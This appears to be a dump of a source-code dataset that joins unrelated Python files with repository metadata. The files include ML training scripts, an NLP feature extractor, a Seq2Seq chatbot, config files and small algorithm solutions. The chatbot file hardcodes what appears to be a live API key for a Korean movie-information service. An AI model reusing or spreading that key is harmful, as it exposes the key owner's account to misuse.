(ALL_TRAINS, ALL_VALIDS, ALL_TESTS, PRICES_TRAIN, PRICES_VALID, PRICES_TEST, LIST_PREPROCESS) = get_houses_data(CSV_PATH)
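# ALL_TRAINS/ALL_VALIDS/ALL_TESTS appear to hold one feature matrix per
# preprocessing variant listed in LIST_PREPROCESS, while the price targets
# are shared across all variants (they are indexed together below).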
# --- SAG ---
# Set the functions, the options and the parameters
FUNCTIONS_SAG = [square_sag, acc_sag, visu_sag]
OPTIONS = [ADD_BIAS, False, False] # [ADD_BIAS, VISUALISATION, SHOW_PLOTS]
PARAM_SAG = np.array([[0.00007, 0.0003], [0.07, 0.3]]) # [LAMBDA, ETA]
if YOU_WANT_SAG:
# -- Training --
print("Train the sag...")
NB_TRAININGS = len(ALL_TRAINS)
ACCURACIES = np.zeros(NB_TRAININGS)
ACCURACY_MAX = 0
LAMBDA_OPT = 0
ETA_OPT = 0
IDX_TRY_OPT = None
for idx_try in range(NB_TRAININGS):
print(LIST_PREPROCESS[idx_try])
# Training with the parameters
RESULTS_SAG = sag_train(ALL_TRAINS[idx_try], PRICES_TRAIN, ALL_VALIDS[idx_try], PRICES_VALID, FUNCTIONS_SAG,
OPTIONS, PARAM_SAG)
(ACCURACY_VALID, LAMBDA, ETA) = RESULTS_SAG
# Update the global parameters
ACCURACIES[idx_try] = ACCURACY_VALID
print("Validation accuracy", ACCURACY_VALID)
if ACCURACY_MAX < ACCURACY_VALID:
ACCURACY_MAX = ACCURACY_VALID
LAMBDA_OPT = LAMBDA
ETA_OPT = ETA
IDX_TRY_OPT = idx_try
# -- Testing with the best parameters --
print("Test the sag...")
PARAMETERS = [ADD_BIAS, LAMBDA_OPT, ETA_OPT]
ACCURACY_TEST = sag_test(ALL_TRAINS[IDX_TRY_OPT], PRICES_TRAIN, ALL_TESTS[IDX_TRY_OPT], PRICES_TEST, square_sag,
acc_sag, PARAMETERS)
print("The accuracy for the test set is :", ACCURACY_TEST)
print("It was made with the preprocessing :", LIST_PREPROCESS[IDX_TRY_OPT])
print("The optimal value of lambda is :", LAMBDA_OPT)
print("The optimal value of eta is :", ETA_OPT)
# Plot the losses
plt.figure()
plt.bar(np.arange(0, NB_TRAININGS, 1), ACCURACIES)
plt.xlabel("Different preprocessing")
plt.ylabel("Validation accuracy")
plt.show()
# --- SDCA ---
# Set the kernel parameters and the functions
if POLY_KERNEL:
KERNEL = polynomial_kernel
else:
KERNEL = gaussian_kernel
FUNCTIONS_SDCA = [square_sdca, step_sdca, POLY_KERNEL, KERNEL, acc_sdca]
# Set the range of the parameters for the optimisation : box, degree or gamma
if POLY_KERNEL:
PARAM_SDCA = np.array([[0.1, 3], [1, 5]])
else:
PARAM_SDCA = np.array([[5, 10], [0.005, 0.009]]) # [BOX, GAMMA]
VISU_SDCA = [False, False, sdca_visu, None, None] # [SHOW_PLOTS, SHOW_VISU, VISUALISATION, POINTS, VALUES]
if YOU_WANT_SDCA:
# -- Training --
print("Train the sdca...")
NB_TRAININGS = len(ALL_TRAINS)
ACCURACIES = np.zeros(NB_TRAININGS)
ACCURACY_MAX = 0
BOX_OPT = 0
PARAM_OPT = 0
IDX_TRY_OPT = None
for idx_try in range(NB_TRAININGS):
print(LIST_PREPROCESS[idx_try])
# Training with the parameters
RESULTS_SDCA = sdca_train(ALL_TRAINS[idx_try], PRICES_TRAIN, ALL_VALIDS[idx_try], PRICES_VALID, FUNCTIONS_SDCA,
VISU_SDCA, PARAM_SDCA)
(ACCURACY_VALID, BOX, KERNEL_PARAM) = RESULTS_SDCA
# Update the global parameters
ACCURACIES[idx_try] = ACCURACY_VALID
print("Validation accuracy", ACCURACY_VALID)
if ACCURACY_MAX < ACCURACY_VALID:
ACCURACY_MAX = ACCURACY_VALID
BOX_OPT = BOX
PARAM_OPT = KERNEL_PARAM
IDX_TRY_OPT = idx_try
# -- Testing with the best parameters --
print("Test the sdca...")
PARAMETERS = [BOX_OPT, PARAM_OPT]
ACCURACY_TEST = sdca_test(ALL_TRAINS[IDX_TRY_OPT], PRICES_TRAIN, ALL_TESTS[IDX_TRY_OPT], PRICES_TEST,
FUNCTIONS_SDCA, PARAMETERS)
print("The accuracy for the test set is :", ACCURACY_TEST)
print("It was made with the preprocessing :", LIST_PREPROCESS[IDX_TRY_OPT])
print("The optimal value of the box is :", BOX_OPT)
if POLY_KERNEL:
print("The optimal degree of the polynomial kernel is :", PARAM_OPT)
else:
print("The optimal gamma of the gaussian kernel is :", PARAM_OPT)
# Plot the losses
plt.figure()
plt.bar(np.arange(0, NB_TRAININGS, 1), ACCURACIES)
plt.xlabel("Different preprocessing")
plt.ylabel("Validation accuracy")
plt.show()
| [
"[email protected]"
]
| |
349c0e8015ac58454cfde9a9351ad0e72ba789e7 | d02508f5ebbbdb4ba939ba830a8e8d9abc69774a | /Array/combinationSum.py | 3162ed77fd98c7e3440de32e89a479d00c864026 | []
| no_license | sameersaini/hackerank | e30c6270aaa0e288fa8b25392819509849cdabad | 3e66f89e02ade703715237722eda2fa2b135bb79 | refs/heads/master | 2021-06-12T09:24:15.266218 | 2019-10-18T02:22:00 | 2019-10-18T02:22:00 | 31,360,776 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 710 | py | def getCombinations(result, combination, candidates, target, startIndex):
    if target == 0:
        result.append(combination[::])  # store a copy of the current combination
        return
for i in range(startIndex, len(candidates)):
if candidates[i] > target:
break
combination.append(candidates[i])
getCombinations(result, combination, candidates, target - candidates[i], i)
combination.pop()
class Solution:
def combinationSum(self, candidates, target):
if len(candidates) == 0: return []
candidates.sort()
result = []
combination = []
getCombinations(result, combination, candidates, target, 0)
return result
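# Quick sanity check (hypothetical driver, not part of the original solution):
if __name__ == "__main__":
    print(Solution().combinationSum([2, 3, 6, 7], 7))  # [[2, 2, 3], [7]]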
| [
"[email protected]"
]
| |
e593a1aed501a0ba2ff2741d38bd5ecdde517abc | aa3cc5cddf07721962cdd92611daa0198ecc32ea | /nerds/features/rel2bow.py | c6ff2e0bab60aa292a61dbfca21f0c8c69e8a250 | []
| no_license | druv022/Disease-Normalization-with-Graph-Embeddings | 486a7c59d94ff502145796c1921611b937a4006a | c816ba37815d06bea394a99614e07baa3ebed5f2 | refs/heads/master | 2023-02-26T12:55:18.927522 | 2023-02-14T02:36:15 | 2023-02-14T02:36:15 | 242,658,320 | 3 | 1 | null | null | null | null | UTF-8 | Python | false | false | 7,181 | py | from pathlib import Path
from scipy.sparse import csc_matrix
from sklearn.externals import joblib
from sklearn.feature_extraction.text import CountVectorizer
from nerds.features.base import RelationFeatureExtractor, UNKNOWN_WORD, UNKNOWN_LABEL, UNKNOWN_POS_TAG, \
UNKNOWN_DEPENDENCY, BOWFeatureExtractor
from nerds.util.file import mkdir
from nerds.util.logging import get_logger
log = get_logger()
KEY = "rel2bow"
class BOWRelationFeatureExtractor(BOWFeatureExtractor, RelationFeatureExtractor):
def __init__(self):
super().__init__()
self.key = KEY
self.word_vectorizer = None
self.label_vectorizer = None
self.pos_vectorizer = None
self.dep_vectorizer = None
def transform(self, X, y=None, relation_labels=None):
log.info("Generating features for {} documents...".format(len(X)))
self.docs_examples = list(self.annotated_documents_to_examples(X, relation_labels=relation_labels))
ent_words = []
ent_labels = []
ent_pos_tags = []
ent_deps = []
rel_labels = []
for doc, examples in self.docs_examples:
for ex in examples:
ent_words += [ex.context["source.text"], ex.context["target.text"]]
ent_labels += [ex.context["source.label"], ex.context["target.label"]]
ent_pos_tags += [ex.context["source.pos"], ex.context["target.pos"]]
ent_deps += [ex.context["dependency"]]
rel_labels += [ex.label]
# add unknown values
ent_words += [UNKNOWN_WORD, UNKNOWN_WORD]
ent_labels += [UNKNOWN_LABEL, UNKNOWN_LABEL]
ent_pos_tags += [UNKNOWN_POS_TAG, UNKNOWN_POS_TAG]
ent_deps += [UNKNOWN_DEPENDENCY]
        if not self.word_vectorizer:
            # first run: build fresh vocabularies directly from the data
            self.word_vectorizer = CountVectorizer(binary=True)
            self.label_vectorizer = CountVectorizer(binary=True)
            self.pos_vectorizer = CountVectorizer(binary=True)
            self.dep_vectorizer = CountVectorizer(binary=True)
        else:
            # reuse the previously fitted vocabularies, and map tokens that
            # fall outside them to the UNKNOWN_* placeholders (on the first
            # run `vocabulary` is still None, so this remapping must only
            # happen on this branch)
            self.word_vectorizer = CountVectorizer(binary=True, vocabulary=self.word_vectorizer.vocabulary_)
            self.label_vectorizer = CountVectorizer(binary=True, vocabulary=self.label_vectorizer.vocabulary_)
            self.pos_vectorizer = CountVectorizer(binary=True, vocabulary=self.pos_vectorizer.vocabulary_)
            self.dep_vectorizer = CountVectorizer(binary=True, vocabulary=self.dep_vectorizer.vocabulary_)
            ent_words = self._process_unknown_values(
                ent_words, self.word_vectorizer.vocabulary, UNKNOWN_WORD)
            ent_labels = self._process_unknown_values(
                ent_labels, self.label_vectorizer.vocabulary, UNKNOWN_LABEL)
            ent_pos_tags = self._process_unknown_values(
                ent_pos_tags, self.pos_vectorizer.vocabulary, UNKNOWN_POS_TAG)
            ent_deps = self._process_unknown_values(
                ent_deps, self.dep_vectorizer.vocabulary, UNKNOWN_DEPENDENCY)
# vectorize
log.info("Vectorizing {} textual entries (words)...".format(len(ent_words)))
word_vectors = self.word_vectorizer.fit_transform(ent_words)
log.info("Vectorizing {} textual entries (labels)...".format(len(ent_labels)))
label_vectors = self.label_vectorizer.fit_transform(ent_labels)
log.info("Vectorizing {} textual entries (POS tags)...".format(len(ent_pos_tags)))
pos_vectors = self.pos_vectorizer.fit_transform(ent_pos_tags)
log.info("Vectorizing {} textual entries (dependency types)...".format(len(ent_deps)))
dep_vectors = self.dep_vectorizer.fit_transform(ent_deps)
# get shapes
n_wor, m_wor = word_vectors.get_shape()
n_lab, m_lab = label_vectors.get_shape()
n_pos, m_pos = pos_vectors.get_shape()
n_dep, m_dep = dep_vectors.get_shape()
# create indices
rows, cols, vals = [], [], []
# ignore the last auxiliary value
for row in range(n_dep - 1):
for col in word_vectors.getrow(2 * row).nonzero()[1]:
rows += [row]
cols += [col]
vals += [1]
for col in word_vectors.getrow(2 * row + 1).nonzero()[1]:
rows += [row]
cols += [col + m_wor]
vals += [1]
for col in label_vectors.getrow(2 * row).nonzero()[1]:
rows += [row]
cols += [col + 2 * m_wor]
vals += [1]
for col in label_vectors.getrow(2 * row + 1).nonzero()[1]:
rows += [row]
cols += [col + 2 * m_wor + m_lab]
vals += [1]
for col in pos_vectors.getrow(2 * row).nonzero()[1]:
rows += [row]
cols += [col + 2 * m_wor + 2 * m_lab]
vals += [1]
for col in pos_vectors.getrow(2 * row + 1).nonzero()[1]:
rows += [row]
cols += [col + 2 * m_wor + 2 * m_lab + m_pos]
vals += [1]
for col in dep_vectors.getrow(row).nonzero()[1]:
rows += [row]
cols += [col + 2 * m_wor + 2 * m_lab + 2 * m_pos]
vals += [1]
# create a sparse matrix of features
log.info("Creating a feature matrix...")
feature_matrix = csc_matrix((vals, (rows, cols)), shape=(n_dep - 1, 2 * m_wor + 2 * m_lab + 2 * m_pos + m_dep))
return feature_matrix, rel_labels
def _process_unknown_values(self, entries, vocabulary, unknown_label):
entries_ref = []
for entry in entries:
known_tokens = []
for token in entry.split():
if token.lower() in vocabulary:
known_tokens += [token]
else:
known_tokens += [unknown_label]
entries_ref += [" ".join(known_tokens)]
return entries_ref
def save(self, file_path):
save_path = Path(file_path)
mkdir(save_path)
words_path = save_path.joinpath("words.dict")
labels_path = save_path.joinpath("labels.dict")
pos_path = save_path.joinpath("pos.dict")
dep_path = save_path.joinpath("dep.dict")
# save dictionaries
# we don't save examples for now
joblib.dump(self.word_vectorizer, words_path)
joblib.dump(self.label_vectorizer, labels_path)
joblib.dump(self.pos_vectorizer, pos_path)
joblib.dump(self.dep_vectorizer, dep_path)
def load(self, file_path):
load_path = Path(file_path)
words_path = load_path.joinpath("words.dict")
labels_path = load_path.joinpath("labels.dict")
pos_path = load_path.joinpath("pos.dict")
dep_path = load_path.joinpath("dep.dict")
# load dictionaries
# we don't load examples for now
self.word_vectorizer = joblib.load(words_path)
self.label_vectorizer = joblib.load(labels_path)
self.pos_vectorizer = joblib.load(pos_path)
self.dep_vectorizer = joblib.load(dep_path)
return self
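# Rough usage sketch (the document objects and label below are assumptions
# based on the nerds base classes, not a tested API):
#
#     extractor = BOWRelationFeatureExtractor()
#     X_feats, y = extractor.transform(annotated_docs, relation_labels=["treats"])
#     extractor.save("features/rel2bow")
#     extractor = BOWRelationFeatureExtractor().load("features/rel2bow")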
| [
"[email protected]"
]
| |
402ed76f4050dfce87cdf347cee70aa1d417b2b9 | bc233c24523f05708dd1e091dca817f9095e6bb5 | /bitmovin_api_sdk/models/dolby_digital_plus_loudness_control_mode.py | efc53743e4d22e242284b556533a00f56e0a0846 | [
"MIT"
]
| permissive | bitmovin/bitmovin-api-sdk-python | e3d6cf8eb8bdad62cb83ec77c0fc4950b06b9cdd | b0860c0b1be7747cf22ad060985504da625255eb | refs/heads/main | 2023-09-01T15:41:03.628720 | 2023-08-30T10:52:13 | 2023-08-30T10:52:13 | 175,209,828 | 13 | 14 | MIT | 2021-04-29T12:30:31 | 2019-03-12T12:47:18 | Python | UTF-8 | Python | false | false | 252 | py | # coding: utf-8
from enum import Enum
from six import string_types, iteritems
from bitmovin_api_sdk.common.poscheck import poscheck_model
class DolbyDigitalPlusLoudnessControlMode(Enum):
PASSTHROUGH = "PASSTHROUGH"
CORRECTION = "CORRECTION"
| [
"[email protected]"
]
| |
edeaa753730e8d490de3fff90f59fa424ef6082b | 2e682fd72e3feaa70e3f7bf2a3b83c50d783ec02 | /PyTorch/contrib/cv/semantic_segmentation/DeeplabV3_for_Pytorch/configs/pspnet/pspnet_r50-d8_512x1024_80k_cityscapes.py | c1e35bff55747361c0b9e9b26abba13a98faab17 | [
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"BSD-3-Clause",
"LicenseRef-scancode-generic-cla",
"LicenseRef-scancode-unknown-license-reference",
"GPL-1.0-or-later"
]
| permissive | Ascend/ModelZoo-PyTorch | 4c89414b9e2582cef9926d4670108a090c839d2d | 92acc188d3a0f634de58463b6676e70df83ef808 | refs/heads/master | 2023-07-19T12:40:00.512853 | 2023-07-17T02:48:18 | 2023-07-17T02:48:18 | 483,502,469 | 23 | 6 | Apache-2.0 | 2022-10-15T09:29:12 | 2022-04-20T04:11:18 | Python | UTF-8 | Python | false | false | 827 | py | # Copyright 2021 Huawei
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
_base_ = [
'../_base_/models/pspnet_r50-d8.py', '../_base_/datasets/cityscapes.py',
'../_base_/default_runtime.py', '../_base_/schedules/schedule_80k.py'
]
| [
"[email protected]"
]
| |
de80d3489ba1a197c82a907735c972d03084f4f6 | 163bbb4e0920dedd5941e3edfb2d8706ba75627d | /Code/CodeRecords/2942/60622/287831.py | fbe6f1d8ea8915192bb19f7ed0c3080d26918e11 | []
| no_license | AdamZhouSE/pythonHomework | a25c120b03a158d60aaa9fdc5fb203b1bb377a19 | ffc5606817a666aa6241cfab27364326f5c066ff | refs/heads/master | 2022-11-24T08:05:22.122011 | 2020-07-28T16:21:24 | 2020-07-28T16:21:24 | 259,576,640 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 90 | py | n=input()
l=input().split()
l.sort(reverse=True)
for i in l:
print(i,end=" ")
print()
| [
"[email protected]"
]
| |
7196ceabaee7d344102504ba28399e85aea0a3c2 | 60e6ea6af12bb37450dc4f254f953d81623232ce | /databases/venv/Scripts/pip3.8-script.py | 1b7b98beb5faf95df7a500294d4b8556ee0eb4ab | []
| no_license | vedant3598/PyCharm-Projects | 72a48d3e8468949c59675330c12aad1c7a03de41 | 7f49533b9c66de33c6a44e4864b1a639e6bfb0be | refs/heads/master | 2020-12-14T15:37:53.838758 | 2020-01-18T20:11:50 | 2020-01-18T20:11:50 | 233,339,924 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 403 | py | #!C:\Users\vedan\databases\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==19.0.3','console_scripts','pip3.8'
__requires__ = 'pip==19.0.3'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('pip==19.0.3', 'console_scripts', 'pip3.8')()
)
| [
"[email protected]"
]
| |
b4e33b3180ce6ed1a3986904ec6e74ca3c6384fd | 10d98fecb882d4c84595364f715f4e8b8309a66f | /experience_replay/train.py | 74c4899eac50fc4f53a34183dee9333d07cdb04f | [
"CC-BY-4.0",
"Apache-2.0"
]
| permissive | afcarl/google-research | 51c7b70d176c0d70a5ee31ea1d87590f3d6c6f42 | 320a49f768cea27200044c0d12f394aa6c795feb | refs/heads/master | 2021-12-02T18:36:03.760434 | 2021-09-30T20:59:01 | 2021-09-30T21:07:02 | 156,725,548 | 1 | 0 | Apache-2.0 | 2018-11-08T15:13:53 | 2018-11-08T15:13:52 | null | UTF-8 | Python | false | false | 3,559 | py | # coding=utf-8
# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
r"""Train an agent.
"""
import os
from absl import app
from absl import flags
from dopamine.discrete_domains import run_experiment
import tensorflow.compat.v1 as tf
from experience_replay import run_experience_replay_experiment
flags.DEFINE_string('base_dir', None,
'Base directory to host all required sub-directories.')
flags.DEFINE_multi_string(
'gin_files', [], 'List of paths to gin configuration files (e.g.'
'"third_party/py/dopamine/agents/dqn/dqn.gin").')
flags.DEFINE_multi_string(
'gin_bindings', [],
'Gin bindings to override the values set in the config files '
'(e.g. "DQNAgent.epsilon_train=0.1",'
' "create_atari_environment.game_name="Pong"").')
flags.DEFINE_string(
'schedule', 'continuous_train_and_eval',
'The schedule with which to run the experiment and choose an appropriate '
'Runner. Supported choices are '
'{continuous_train, eval, continuous_train_and_eval}.')
FLAGS = flags.FLAGS
def create_runner(base_dir, create_agent_fn,
schedule='continuous_train_and_eval'):
"""Creates an experiment Runner.
TODO(b/): Figure out the right idiom to create a Runner. The current mechanism
of using a number of flags will not scale and is not elegant.
Args:
base_dir: Base directory for hosting all subdirectories.
create_agent_fn: A function that takes as args a Tensorflow session and a
Gym Atari 2600 environment, and returns an agent.
schedule: string, which type of Runner to use.
Returns:
runner: A `run_experiment.Runner` like object.
Raises:
ValueError: When an unknown schedule is encountered.
"""
assert base_dir is not None
# Continuously runs training and eval till max num_iterations is hit.
if schedule == 'continuous_train_and_eval':
return run_experience_replay_experiment.ElephantRunner(
base_dir, create_agent_fn)
else:
raise ValueError('Unknown schedule: {}'.format(schedule))
def launch_experiment(create_runner_fn, create_agent_fn):
"""Launches the experiment.
Args:
create_runner_fn: A function that takes as args a base directory and a
function for creating an agent and returns a `Runner` like object.
create_agent_fn: A function that takes as args a Tensorflow session and a
Gym environment, and returns an agent.
"""
run_experiment.load_gin_configs(FLAGS.gin_files, FLAGS.gin_bindings)
runner = create_runner_fn(FLAGS.base_dir, create_agent_fn,
schedule=FLAGS.schedule)
runner.run_experiment()
def main(unused_argv):
"""This main function acts as a wrapper around a gin-configurable experiment.
Args:
unused_argv: Arguments (unused).
"""
tf.logging.set_verbosity(tf.logging.INFO)
launch_experiment(create_runner,
run_experience_replay_experiment.create_agent)
if __name__ == '__main__':
flags.mark_flag_as_required('base_dir')
app.run(main)
| [
"[email protected]"
]
| |
f58c4b1e9c6366deb20e2f21faa02caffaaed02d | 0d4ed26eb44d54238d86eff91f7b45ab62609161 | /arakat-core/pipeline_generator/preprocessing/graph/ParentChecker.py | 5051302aa3e4fa7275085426d9e23e4b27e0a954 | [
"Apache-2.0"
]
| permissive | obalcik/arakat | c8583d8ce4d471df3cf3d9ef4a604307b75c30f5 | 7a8a30708bf8f74de7384c290c035a3a65d3ba47 | refs/heads/master | 2020-03-29T21:36:34.118850 | 2018-11-28T12:18:04 | 2018-11-28T12:18:04 | 150,376,678 | 1 | 0 | Apache-2.0 | 2018-09-26T06:10:08 | 2018-09-26T06:10:08 | null | UTF-8 | Python | false | false | 3,103 | py | from domain.HighLevelNodeTypes import HighLevelNodeTypes
from domain.ErrorTypes import ErrorTypes
from domain.SpecialCases import SpecialCases
def check_parents(cur_nodes, edge_info, nodes):
parent1 = cur_nodes[0]["parent"]
parent2 = cur_nodes[1]["parent"]
# No nodes (except Task nodes) can have a None parent.
if(parent1 is None and parent2 is None):
# Edge between task
return {"parent_type": HighLevelNodeTypes.NO_NODE, "error": ErrorTypes.NO_ERROR}
elif(parent1 is None and parent2 is not None):
# Error: since task node cannot be connected with inner nodes (non-task nodes)
# Error: tasks can't include other tasks as inner nodes
if(nodes[parent2]["node_type"] == HighLevelNodeTypes.TASK_NODE.value):
return {"error": ErrorTypes.TASK_INSIDE_TASK_ERROR}
return {"error": ErrorTypes.TASK_TO_INNER_EDGE_ERROR}
elif(parent1 is not None and parent2 is None):
# Error: since task node cannot be connected with inner nodes (non-task nodes)
# Error: tasks can't include other tasks as inner nodes
if (nodes[parent1]["node_type"] == HighLevelNodeTypes.TASK_NODE.value):
return {"error": ErrorTypes.TASK_INSIDE_TASK_ERROR}
return {"error": ErrorTypes.TASK_TO_INNER_EDGE_ERROR}
else:
# Both node have parents.
# Nodes with an edge must have same parents (No Cross Edges).
# -> No edges between inner nodes of different tasks
# -> No edges between inner nodes and nodes under pipeline nodes/cv nodes
# Determine the parent type: Task Node, Pipeline Node or CV Node...
# Special nodes:
# Only allow crossing edges to pipelines from an inner node iff edge carries model
if(parent1 == parent2):
# Siblings of same parents, satisfies conditions above...
# Meta-parent will be used when the parent is pipeline node or cv node.
return {"parent_id": parent1, "parent_type": HighLevelNodeTypes(nodes[parent1]["node_type"]), "meta_parent_id": nodes[parent1]["parent"], "error": ErrorTypes.NO_ERROR}
else:
return __check_special_cases(cur_nodes, edge_info, [nodes[parent1], nodes[parent2]])
def __check_special_cases(cur_nodes, edge_info, parents):
return __is_model_edge_crossing_into_pipeline(cur_nodes, edge_info, parents)
def __is_model_edge_crossing_into_pipeline(cur_nodes, edge_info, parents):
if(parents[0]["node_type"] == HighLevelNodeTypes.TASK_NODE.value and parents[1]["node_type"] == HighLevelNodeTypes.PIPELINE_NODE.value):
if(edge_info["type"]=="model"):
edge_id=cur_nodes[0]["id"] + "-" + cur_nodes[1]["id"]
return {"special_case": {"name": SpecialCases.CROSSING_MODEL_EDGE_TO_PIPELINE, "task_id": parents[0]["id"], "pipeline_id": parents[1]["id"], "model_source_id": cur_nodes[0]["id"], "model_holder_id": cur_nodes[1]["id"], "edge_info": edge_info}, "error": ErrorTypes.NO_ERROR}
else:
# Might add a better name for the error
return {"error": ErrorTypes.NOT_SIBLING_ERROR} | [
"[email protected]"
]
| |
a130e7cbc5096fc05d24b77c1bb957b1e492c07d | f466373b13ae038770990331e0193133d0729caf | /movie_chatbot_server_ver/movie/my_chatbot_textcnn2/Rnn_chatbot/chat.py | 95ab9f0f0589abcc0a1e3a49e074b82312c434ed | []
| no_license | kih1024/chatbot | 92f8a321996707a123bcb90ba10bfd318aabea84 | e2f7741d17e1042c74966dfebc5628a4f4020250 | refs/heads/master | 2018-09-06T16:41:46.515759 | 2018-06-04T15:53:47 | 2018-06-04T15:53:47 | 115,597,558 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 5,653 | py | import tensorflow as tf
import numpy as np
import math
import sys
from Rnn_chatbot.config import FLAGS
from Rnn_chatbot.model import Seq2Seq
from Rnn_chatbot.dialog import Dialog
import xml.etree.ElementTree as ET
import urllib.request
import os
os.environ['TF_CPP_MIN_LOG_LEVEL']='2'
url = "http://www.kobis.or.kr/kobisopenapi/webservice/rest/movie/searchMovieList.xml?key="
key = "2a83ee607d889ae32fca2cf9edbbe573"
url = url + key
class ChatBot:
def __init__(self, voc_path, vector_path, train_dir): #!
        self.dialog = Dialog()  # create the Dialog helper object
        self.dialog.load_vocab(voc_path, vector_path)  # read the dataset sentences line by line and initialize the vocabulary  #! uses chat.voc and word_embedding.voc
        self.model = Seq2Seq(self.dialog.vocab_size)  # build the deep/wide encoder and decoder RNNs and create the model
        # self.model = Seq2Seq(200)
        self.sess = tf.Session()  # session that runs the graph
        tf.reset_default_graph()  # reset the default graph
        ckpt = tf.train.get_checkpoint_state(train_dir)  # locate the saved training checkpoint
        self.model.saver.restore(self.sess, ckpt.model_checkpoint_path)  # restore the Variable values from the checkpoint
        ## the model is built and the session runs it; the saver is kept so the graph can be restored later
    def run(self, sentence):  # drive the chatbot  $$$$$
# sys.stdout.write("> ")
# sys.stdout.flush()
# line = sys.stdin.readline()
line = sentence # $$$$$
while line:
print(self.get_replay(line.strip())) ###
sys.stdout.write("\n> ")
sys.stdout.flush()
line = sys.stdin.readline()
def decode(self, enc_input, dec_input):
if type(dec_input) is np.ndarray:
            dec_input = dec_input.tolist()  # convert to a plain Python list
        # print("enc_input in decode : ", enc_input,"dec_input in decode : ",dec_input)
        # TODO: pick a bucket that fits the sequence size, the way Google's bucketing works
        if(len(enc_input) % 5 != 0):
            input_len = int(((len(enc_input)//5)+1)*5)  # round the input length up to the next multiple of 5 (e.g. 7 -> 10)
        else:
            input_len = len(enc_input)  # encoder input length is already a multiple of 5, keep it as is
        # dec_input_len = int(((len(dec_input) // 5) + 1) * 5)  # decoder input length, bucketed in units of 5
        # print("input_len : ", input_len)
        enc_input, dec_input, _ = self.dialog.transform(enc_input, dec_input,
                                                        input_len,
                                                        FLAGS.max_decode_len)  # pad and build one-hot vectors
        return self.model.predict(self.sess, [enc_input], [dec_input])  # run the session
    def get_replay(self, msg):  # msg: the sentence the user typed
        enc_input = self.dialog.tokenizer(msg, False)  # split the sentence into word tokens
        enc_input = self.dialog.tokens_to_ids(enc_input)  # map tokens to vocabulary ids; words missing from the vocabulary become Unknown
        dec_input = []
        # TODO: move this into the part of the Seq2Seq model that builds the RNN cells, as Google does,
        # so the decoder cell state is constructed step by step from the inputs.
        # Here the final outputs are fed back to grow the sequence incrementally;
        # depending on the situation this approach may actually be more flexible.
        curr_seq = 0
        for i in range(FLAGS.max_decode_len):  # emit up to max_decode_len (20) output tokens
            # print("enc_input : ", enc_input, " , dec_input : ", dec_input)
            outputs = self.decode(enc_input, dec_input)  # pad, build one-hot vectors, then run the session
            # print("outputs : ", outputs)
            if self.dialog.is_eos(outputs[0][curr_seq]):  # stop once the EOS (target) token appears
                break
            elif self.dialog.is_defined(outputs[0][curr_seq]) is not True:  # skip pre-defined special tokens
                dec_input.append(outputs[0][curr_seq])  # feed the decoded word back as the next decoder input
                curr_seq += 1
reply = self.dialog.decode([dec_input], True)
# if self.dialog.keyword :
# utf_keyword = str(self.dialog.keyword[0].encode('utf-8'))[2:-1].replace('\\x', '%')
# real_reply = url + "&movieNm=" + utf_keyword
#
# tree = ET.ElementTree(file=urllib.request.urlopen(real_reply))
# root = tree.getroot()
#
# reply += "\n총 " + str(len(root[1])) + "개의 영화가 있습니다.\n"
#
# count = ""
# for i in range(0, len(root[1])):
# if i < len(root[1]) - 1:
# count = count + root[1][i][1].text + "\n"
# else:
# count = count + root[1][i][1].text + "\n"
#
# reply += count
# self.dialog.keyword = []
return reply
def main(_, sentence): # $$$$$
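    # NOTE: this signature expects the caller (the chatbot server) to pass the
    # user's sentence in directly; `tf.app.run()` below only supplies argv, so
    # the __main__ path needs the sentence wired in separately.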
print("깨어나는 중 입니다. 잠시만 기다려주세요...\n")
chatbot = ChatBot(FLAGS.voc_path, FLAGS.vec_path, FLAGS.train_dir) #! chat.voc, word_embedding.voc을 인자로 넣고, model폴더 안의 데이터들을 확인.
chatbot.run(sentence)
if __name__ == "__main__":
#tf.reset_default_graph()
tf.app.run()
| [
"[email protected]"
]
| |
68a8fa89f93202a0a70bcd74a4cb00d6cd3443ce | 6cbaade56c5db347d1be9a3422a69af52df39b97 | /python_workspace/3_bigdata/02_Standardization_Analysis/1_CSV/3pandas_value_meets_condition.py | 7d6e3720622a55a884ddfd88fa1510ccd7e19c49 | []
| no_license | baewonje/iot_bigdata_- | b54e3772f64b9695efee8632183590628b679e11 | 2ce1af67d2f05abeb2ecd442b7299f349bdb9753 | refs/heads/master | 2020-09-06T09:53:53.018320 | 2019-12-06T08:19:33 | 2019-12-06T08:19:33 | 220,390,928 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 500 | py | # 목적: pandas 문법으로 특정 행을 필터링하기
import pandas as pd
import sys
input_file = sys.argv[1]
output_file = sys.argv[2]
data_frame = pd.read_csv(input_file)
data_frame['Cost'] = data_frame['Cost'].str.strip('$').astype(float)
data_frame_value_meets_condition = data_frame.loc[(data_frame['Supplier Name'].str.contains('Z')) | (data_frame['Cost'] > 600.0), :]
# loc 내부에 ,를 생략하면 에러발생
data_frame_value_meets_condition.to_csv(output_file, index=False ) | [
"[email protected]"
]
| |
fdaf7031d6c27c7b70b0ded64c5e71e167f1d4ed | 8042163dbac5ddf47f078b4d14f4eb6fe1da030d | /tensorflow/python/profiler/profiler_v2_test.py | 50d29c0532f075d553911327a73af863fb9f1cff | [
